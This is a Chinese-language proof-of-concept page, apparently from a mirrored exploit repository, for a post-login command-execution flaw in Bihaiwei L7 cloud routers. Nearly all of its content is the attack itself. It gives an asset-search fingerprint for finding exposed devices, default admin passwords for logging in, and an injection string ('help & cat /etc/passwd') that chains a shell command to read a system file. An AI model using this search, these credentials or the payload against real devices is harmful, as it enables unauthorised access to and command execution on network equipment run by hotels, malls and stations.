admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/碧海威/碧海威L7多款产品存在后台命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

35 lines
1.1 KiB
Markdown
Raw Blame History

# 碧海威 L7多款产品存在后台命令执行漏洞
# 一、漏洞简介
碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品存在后台命令执行漏洞
# 二、影响版本
+ 碧海威 L7云路由
# 三、资产测绘
```plain
product="碧海威科技-L7云路由"
```
![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/vvU9uRd8v176utG_/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-971649.png)
# 四、漏洞复现
使用弱口令登录后台
```plain
admin/admin
admin/admin123
```
![1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a.png](./img/vvU9uRd8v176utG_/1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a-997411.png)
```plain
help & cat /etc/passwd
```
![1717873247660-03aaa28f-7534-404a-9426-de729a732f3e.png](./img/vvU9uRd8v176utG_/1717873247660-03aaa28f-7534-404a-9426-de729a732f3e-517323.png)
> 更新: 2024-06-27 09:15:18
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tteea03oq5v1vp29>
Reference in New Issue View Git Blame Copy Permalink